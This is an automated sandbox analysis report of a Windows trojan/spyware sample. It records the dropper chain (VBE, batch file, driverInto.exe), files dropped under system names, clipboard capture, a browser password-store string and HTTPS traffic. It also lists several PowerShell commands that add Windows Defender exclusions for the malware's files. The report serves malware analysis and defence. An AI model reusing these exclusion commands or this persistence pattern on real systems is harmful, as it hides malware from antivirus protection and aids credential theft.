Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534A2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534D3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 0000000E.00000002.2079916012.000002A734777000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036F3000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887420284.00000000036C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887356359.0000000002F22000.00000002.00000001.01000000.00000000.sdmp, VaRrMrQM.log.25.dr String found in binary or memory: https://ipinfo.io/country
Source: driverInto.exe, 00000004.00000002.1887420284.00000000036AD000.00000004.00000800.00020000.00000000.sdmp, driverInto.exe, 00000004.00000002.1887356359.0000000002F22000.00000002.00000001.01000000.00000000.sdmp, VaRrMrQM.log.25.dr String found in binary or memory: https://ipinfo.io/ip
Source: powershell.exe, 00000009.00000002.3001390385.000001CD90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3224549621.000002616E484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3126110300.000002A7445C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 0000001A.00000003.2074424875.00000155534A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: a7OlxXngyU.25.dr, jwFzc1Bwjm.25.dr, I4rSQ4DoPl.25.dr, qL6QgquN2h.25.dr, X9AyFPTXPw.25.dr, UWkqIDcAnU.25.dr, 2jdfh5ZP1u.25.dr, mKRzB2QGO2.25.dr, i6P9jd53Vj.25.dr, ViuX3uftX7.25.dr, EG1oPNbosu.25.dr, s8ypRMUDEE.25.dr, DGEQpREgU2.25.dr, mn2jOvyUyv.25.dr, b7kPgNYFFk.25.dr, sMGNeFd4yB.25.dr, NYVeaiGNzG.25.dr, kMMy9bcjw2.25.dr, JhZtTziwvM.25.dr, 6Lp9iaSujL.25.dr, k98GPMvgV8.25.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
Creates a window with clipboard capturing capabilities
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Window created: window name: CLIPBRDWNDCLASS

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01006FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_01006FAA
Creates files inside the system directory
Source: C:\portintosvc\driverInto.exe File created: C:\Windows\Registration\csrss.exe Jump to behavior
Source: C:\portintosvc\driverInto.exe File created: C:\Windows\Registration\886983d96e3d3e Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100848E 0_2_0100848E
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01016CDC 0_2_01016CDC
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01017153 0_2_01017153
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010251C9 0_2_010251C9
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01014088 0_2_01014088
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010100B7 0_2_010100B7
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010040FE 0_2_010040FE
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010143BF 0_2_010143BF
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010162CA 0_2_010162CA
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010032F7 0_2_010032F7
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100C426 0_2_0100C426
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0102D440 0_2_0102D440
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100F461 0_2_0100F461
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010177EF 0_2_010177EF
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100E9B7 0_2_0100E9B7
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_010319F4 0_2_010319F4
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100286B 0_2_0100286B
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0102D8EE 0_2_0102D8EE
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01024F9A 0_2_01024F9A
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100EFE2 0_2_0100EFE2
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01013E0B 0_2_01013E0B
Source: C:\portintosvc\driverInto.exe Code function: 4_2_00007FFD9BAC0D78 4_2_00007FFD9BAC0D78
Source: C:\portintosvc\driverInto.exe Code function: 4_2_00007FFD9BEBC1A1 4_2_00007FFD9BEBC1A1
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\DtICHrzA.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: String function: 0101EB78 appears 39 times
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: String function: 0101F5F0 appears 31 times
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: String function: 0101EC50 appears 56 times
Uses 32bit PE files
Source: Vqzx4PFehn.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: driverInto.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: csrss.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: services.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XXPWErhsUbDrk.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XXPWErhsUbDrk.exe0.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XXPWErhsUbDrk.exe1.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@38/290@4/4
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_01006C74 GetLastError,FormatMessageW, 0_2_01006C74
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_0101A6C2
Source: C:\portintosvc\driverInto.exe File created: C:\Program Files (x86)\windows defender\services.exe Jump to behavior
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\DtICHrzA.log Jump to behavior
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Mutant created: NULL
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-B36Ltm7X6ZT1qAIt57Ky
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\AppData\Local\Temp\gDT3vrmrV2 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" "
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Command line argument: sfxname 0_2_0101DF1E
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Command line argument: sfxstime 0_2_0101DF1E
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Command line argument: STARTDLG 0_2_0101DF1E
Source: Vqzx4PFehn.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 7ZM62vKokH.25.dr, XH0l3EA6US.25.dr, XFBJ4ivL6T.25.dr, aatb8W3AVz.25.dr, DdCBjfyxuu.25.dr, 4xF0ndNYR1.25.dr, DOZALIe7mA.25.dr, PzXT2lkpI9.25.dr, mOVdiwrw9I.25.dr, chBRvlN2pN.25.dr, ZaT8ByDEyf.25.dr, 4JEijRsXB3.25.dr, RGjzexYIco.25.dr, lbde1gtHxg.25.dr, xfipqq1p8e.25.dr, 1XLlMziEAg.25.dr, cm36ikub3D.25.dr, XHZm90MClc.25.dr, QOSa21ACkN.25.dr, 8bow8ajICu.25.dr, sYSYXONfMF.25.dr, 6RlmaiBDJh.25.dr, ioPbfUZlBC.25.dr, s5lJY8tuip.25.dr, c58700x8F4.25.dr, GdB4o2Atya.25.dr, xM1Nd8MkBx.25.dr, CdrHKSyFQn.25.dr, B4RFcMEvKM.25.dr, r3vpaV4K4x.25.dr, q5NoW3a56g.25.dr, 4nwBgY6nYM.25.dr, 8RQK1aDBdJ.25.dr, Vnl6vfjE2e.25.dr, k2kD7gtsCl.25.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Vqzx4PFehn.exe ReversingLabs: Detection: 60%
Source: Vqzx4PFehn.exe Virustotal: Detection: 70%
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe File read: C:\Users\user\Desktop\Vqzx4PFehn.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Vqzx4PFehn.exe "C:\Users\user\Desktop\Vqzx4PFehn.exe"
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\portintosvc\driverInto.exe "C:\portintosvc/driverInto.exe"
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe'
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\portintosvc\driverInto.exe "C:\portintosvc/driverInto.exe" Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe' Jump to behavior
Source: C:\portintosvc\driverInto.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe"
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Section loaded: iertutil.dll Jump to behavior
